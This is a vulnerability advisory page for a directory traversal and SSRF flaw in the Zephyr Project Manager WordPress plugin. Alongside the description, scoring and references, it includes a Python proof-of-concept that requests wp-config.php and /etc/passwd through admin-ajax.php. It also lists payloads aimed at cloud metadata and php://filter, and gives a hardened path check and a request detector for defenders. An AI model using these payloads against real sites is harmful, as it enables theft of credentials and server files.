Security Vulnerability Report
CVE-2025-12496 CVSS 4.9 MEDIUM

CVE-2025-12496

Published: 2025-12-17 08:15:43
Last Modified: 2026-04-15 00:35:42

Description

The Zephyr Project Manager plugin for WordPress is vulnerable to Directory Traversal (CWE-22) in all versions up to, and including, 3.3.203 via the `file` parameter. This makes it possible for authenticated attackers with Custom-level access and above to read the contents of arbitrary files on the server, which can contain sensitive information such as the database credentials in `wp-config.php`. On servers that have `allow_url_fopen` enabled, the same unvalidated parameter also allows Server-Side Request Forgery, since the value reaches a PHP file function that accepts URL stream wrappers (`http://`, `php://`, and so on) as well as filesystem paths.
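The two faces of the bug (path escape and stream-wrapper SSRF) and the containment check that stops both, written in Python as an added illustration rather than in the plugin's PHP; this is not code from the plugin or from the advisory, and the base directory, function names and payloads below are hypothetical. `naive_read` models the vulnerable pattern (join the user value onto a base directory, hand anything that looks like a URL to the file API); `safe_resolve` is the hardened form: refuse wrappers and NUL bytes, resolve symlinks and `..` with `realpath`, and require the result to stay inside the base directory.

```python
import os
import re

# Anything of the form scheme:// is a PHP stream wrapper candidate
# (http://, ftp://, php://, phar://, data://) once allow_url_fopen is on.
_WRAPPER_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*://")

# Hypothetical plugin storage directory used for the demonstration.
BASE_DIR = "/var/www/html/wp-content/uploads/zephyr-project-manager"


def naive_read(base_dir, user_path):
    """Vulnerable pattern (modelled on the bug class, not the plugin's code).

    Returns what the file API would be asked to open: a URL if the value
    carries a wrapper (SSRF), otherwise base_dir joined with the raw value,
    which '../' sequences or an absolute path can steer anywhere.
    """
    if _WRAPPER_RE.match(user_path):
        return ("url", user_path)
    return ("file", os.path.join(base_dir, user_path))


def safe_resolve(base_dir, user_path):
    """Hardened check: absolute path if it stays inside base_dir, else None."""
    if "\0" in user_path or _WRAPPER_RE.match(user_path):
        return None
    base = os.path.realpath(base_dir)
    # realpath collapses '..' and follows symlinks; os.path.join discards
    # base if user_path is absolute, which the containment test below catches.
    target = os.path.realpath(os.path.join(base, user_path))
    # commonpath, not startswith: '/x/zephyr-project-manager-old' would pass
    # a plain prefix test against '/x/zephyr-project-manager'.
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def check_payloads(base_dir=BASE_DIR):
    """Run the PoC-style payloads through both implementations."""
    payloads = [
        "reports/q3.pdf",                          # legitimate, inside base
        "../../../wp-config.php",                  # classic traversal
        "/etc/passwd",                             # absolute path
        "../zephyr-project-manager-old/secret",    # sibling-prefix trap
        "http://169.254.169.254/latest/meta-data/",  # SSRF via allow_url_fopen
        "php://filter/convert.base64-encode/resource=../../../wp-config.php",
    ]
    return {p: (naive_read(base_dir, p), safe_resolve(base_dir, p)) for p in payloads}


if __name__ == "__main__":
    for payload, (naive, safe) in check_payloads().items():
        print(f"{payload!r}\n  naive -> {naive}\n  safe  -> {safe}")
```

Only the first payload survives `safe_resolve`; every other one is rejected before any file or network access happens, which is the property a fix for this CVE has to establish.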

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
Weakness
CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)

Configurations (Affected Products)

No CPE configuration data is available from NVD for this record.

Zephyr Project Manager <= 3.3.203 (all versions up to and including 3.3.203)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys

import requests

# CVE-2025-12496 PoC - Zephyr Project Manager Directory Traversal
# Target: WordPress site with Zephyr Project Manager plugin <= 3.3.203
# Authentication: requires Custom-level access or higher (PR:H in the CVSS vector)


def exploit_directory_traversal(target_url, cookie, file_path='../../../wp-config.php'):
    """Send a traversal payload in the `file` parameter and return the response body."""
    endpoint = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"

    # The AJAX action name is a guess; confirm it against the referenced
    # includes/Base/AjaxHandler.php before relying on it.
    data = {
        'action': 'zephyr_get_file',  # Likely AJAX action
        'file': file_path,
    }
    headers = {'Cookie': cookie}

    try:
        response = requests.post(endpoint, data=data, headers=headers, timeout=30)
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return None

    # admin-ajax.php answers 200 with a bare "0" (unknown action) or "-1"
    # (nonce/permission failure), so a 200 status alone is not proof of success.
    if response.status_code != 200 or response.text.strip() in ('0', '-1'):
        print(f"[-] Request failed: HTTP {response.status_code}, body {response.text[:40]!r}")
        return None

    print(f"[+] Successfully retrieved: {file_path}")
    print(f"[+] Content length: {len(response.text)} bytes")
    print(f"[+] Content preview:\n{response.text[:500]}")
    return response.text


if __name__ == '__main__':
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-12496.py <target_url> <cookie>")
        print("Example: python cve-2025-12496.py http://example.com 'wordpress_logged_in=xxx'")
        sys.exit(1)

    target = sys.argv[1]
    cookie = sys.argv[2]

    # Test various sensitive files; the number of '../' needed depends on where
    # the plugin's base directory sits relative to the WordPress root.
    files = [
        '../../../wp-config.php',
        '../../../wp-config.php.bak',
        '../../../etc/passwd',
        '../../../etc/hosts',
    ]

    for f in files:
        print(f"\n[*] Attempting to read: {f}")
        exploit_directory_traversal(target, cookie, f)
```
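Detection for the request shape the PoC above produces, as an added example that is not part of the advisory or the plugin. It keys on the `file` parameter of any request to `wp-admin/admin-ajax.php` rather than on the guessed action name, decodes twice to catch double-encoded `%252e%252e`, and classifies the value as traversal or stream-wrapper SSRF. The sample requests are constructed for the example; note that the PoC sends its payload in the POST body, which ordinary access logs do not record, so this logic belongs in a WAF, a request-logging middleware or a proxy that sees bodies.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample requests, not real traffic: (method, path, query string, body)
SAMPLE_REQUESTS = [
    ("POST", "/wp-admin/admin-ajax.php", "",
     "action=zephyr_get_file&file=reports%2Fq3.pdf"),
    ("POST", "/wp-admin/admin-ajax.php", "",
     "action=zephyr_get_file&file=..%2F..%2F..%2Fwp-config.php"),
    ("GET", "/wp-admin/admin-ajax.php",
     "action=zephyr_get_file&file=%252e%252e%2F%252e%252e%2Fetc%2Fpasswd", ""),
    ("POST", "/wp-admin/admin-ajax.php", "",
     "action=zephyr_get_file&file=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F"),
    ("GET", "/wp-login.php", "", ""),
]

_WRAPPER_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*://")


def classify_file_param(value):
    """Return 'ssrf', 'traversal' or None for one decoded `file` value."""
    # parse_qs already decoded once; decode again so %252e%252e (-> %2e%2e -> ..)
    # and backslash separators do not slip past the check.
    v = unquote(value).replace("\\", "/")
    if _WRAPPER_RE.match(v):
        return "ssrf"
    if v.startswith("/") or ".." in v.split("/"):
        return "traversal"
    return None


def inspect_request(method, path, query, body):
    """Return a verdict for one request, or None if it is not suspicious."""
    if not path.endswith("/wp-admin/admin-ajax.php"):
        return None
    params = {}
    for raw in (query, body):
        if raw:
            params.update(parse_qs(raw, keep_blank_values=True))
    for value in params.get("file", []):
        verdict = classify_file_param(value)
        if verdict:
            return verdict
    return None


def scan(requests_list=SAMPLE_REQUESTS):
    """Return [(index, verdict)] for every flagged request."""
    findings = []
    for i, (method, path, query, body) in enumerate(requests_list):
        verdict = inspect_request(method, path, query, body)
        if verdict:
            findings.append((i, verdict))
    return findings


if __name__ == "__main__":
    for i, verdict in scan():
        print(f"request #{i}: {verdict} via file={SAMPLE_REQUESTS[i][2] or SAMPLE_REQUESTS[i][3]}")
```

Because the vulnerability needs an authenticated Custom-level user, pair a hit with the WordPress user behind the `wordpress_logged_in` cookie: a traversal attempt from a low-privilege account is the signal worth paging on.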

References

https://plugins.trac.wordpress.org/browser/zephyr-project-manager/trunk/includes/Base/AjaxHandler.php#L3506
https://plugins.trac.wordpress.org/browser/zephyr-project-manager/trunk/includes/Core/Projects.php#L1870
https://www.wordfence.com/threat-intel/vulnerabilities/id/2b4b0640-d61a-4969-a5c0-d2d709fb56d0?source=cve
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12496",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-17T08:15:42.787",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Zephyr Project Manager plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.3.203 via the `file` parameter. This makes it possible for authenticated attackers, with Custom-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. On a servers that have `allow_url_fopen` enabled, this issue allows for Server-Side Request Forgery"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 4.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-22"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/zephyr-project-manager/trunk/includes/Base/AjaxHandler.php#L3506",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/zephyr-project-manager/trunk/includes/Core/Projects.php#L1870",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2b4b0640-d61a-4969-a5c0-d2d709fb56d0?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```